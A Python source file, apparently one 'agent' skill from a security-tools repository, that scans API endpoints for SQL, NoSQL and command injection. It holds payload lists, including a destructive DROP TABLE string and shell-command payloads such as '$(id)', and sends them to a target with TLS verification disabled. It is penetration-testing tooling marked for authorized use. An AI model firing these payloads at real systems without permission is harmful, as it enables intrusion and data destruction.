Files
T
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

143 lines
5.0 KiB
Python

#!/usr/bin/env python3
"""Agent for testing API injection vulnerabilities (SQL, NoSQL, command injection)."""
import argparse
import json
import urllib.parse
from datetime import datetime, timezone
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
SQL_PAYLOADS = [
"' OR '1'='1", "' OR 1=1--", "'; DROP TABLE users;--",
"' UNION SELECT NULL,NULL--", "1' AND SLEEP(5)--",
"admin'--", "' OR ''='",
]
NOSQL_PAYLOADS = [
'{"$gt":""}', '{"$ne":""}', '{"$regex":".*"}',
'{"$where":"sleep(5000)"}',
]
COMMAND_INJECTION_PAYLOADS = [
"; id", "| whoami", "$(id)", "`id`",
"; sleep 5", "| sleep 5",
]
ERROR_SIGNATURES = {
"sql": ["sql syntax", "mysql", "postgresql", "sqlite", "ora-", "mssql",
"unclosed quotation", "quoted string not properly terminated"],
"nosql": ["bson", "mongodb", "mongoerror", "json parse error"],
"command": ["sh:", "bash:", "/bin/", "command not found", "uid="],
}
def test_parameter(url, param_name, param_value, payloads, method="GET", headers=None):
"""Test a single parameter with injection payloads."""
if not HAS_REQUESTS:
return []
findings = []
baseline_url = f"{url}?{param_name}={urllib.parse.quote(param_value)}"
try:
baseline = requests.get(baseline_url, headers=headers, timeout=10, verify=False)
baseline_len = len(baseline.text)
baseline_time = baseline.elapsed.total_seconds()
except requests.RequestException:
return findings
for payload in payloads:
test_value = urllib.parse.quote(payload)
try:
if method == "GET":
test_url = f"{url}?{param_name}={test_value}"
resp = requests.get(test_url, headers=headers, timeout=15, verify=False)
else:
data = {param_name: payload}
resp = requests.post(url, json=data, headers=headers, timeout=15, verify=False)
resp_text = resp.text.lower()
indicators = []
for category, sigs in ERROR_SIGNATURES.items():
for sig in sigs:
if sig in resp_text:
indicators.append(f"{category}_error: {sig}")
if abs(len(resp.text) - baseline_len) > baseline_len * 0.5 and baseline_len > 0:
indicators.append(f"Response size anomaly: {baseline_len} -> {len(resp.text)}")
if resp.elapsed.total_seconds() > baseline_time + 4:
indicators.append(f"Time-based: {resp.elapsed.total_seconds():.1f}s vs baseline {baseline_time:.1f}s")
if indicators:
findings.append({
"parameter": param_name,
"payload": payload,
"status_code": resp.status_code,
"indicators": indicators,
})
except requests.RequestException:
continue
return findings
def scan_api_endpoint(url, params, method="GET", headers=None):
"""Scan an API endpoint with all injection categories."""
all_findings = []
for param_name, param_value in params.items():
all_findings.extend(test_parameter(url, param_name, param_value, SQL_PAYLOADS, method, headers))
all_findings.extend(test_parameter(url, param_name, param_value, NOSQL_PAYLOADS, method, headers))
all_findings.extend(test_parameter(url, param_name, param_value, COMMAND_INJECTION_PAYLOADS, method, headers))
return all_findings
def main():
parser = argparse.ArgumentParser(
description="Test API endpoints for injection vulnerabilities (authorized testing only)"
)
parser.add_argument("--url", required=True, help="Target API endpoint URL")
parser.add_argument("--params", required=True, help="Parameters as key=value,key2=value2")
parser.add_argument("--method", default="GET", choices=["GET", "POST"])
parser.add_argument("--header", nargs="*", help="Custom headers as Key:Value")
parser.add_argument("--output", "-o", help="Output JSON report")
args = parser.parse_args()
print("[*] API Injection Testing Agent")
print("[!] For authorized security testing only")
params = dict(p.split("=", 1) for p in args.params.split(","))
headers = {}
if args.header:
for h in args.header:
k, _, v = h.partition(":")
headers[k.strip()] = v.strip()
findings = scan_api_endpoint(args.url, params, args.method, headers or None)
report = {
"timestamp": datetime.now(timezone.utc).isoformat(),
"target": args.url,
"parameters_tested": list(params.keys()),
"findings": findings,
"vulnerability_count": len(findings),
"risk_level": "CRITICAL" if findings else "LOW",
}
print(f"[*] Tested {len(params)} parameters, found {len(findings)} potential injections")
if args.output:
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
print(f"[*] Report saved to {args.output}")
else:
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()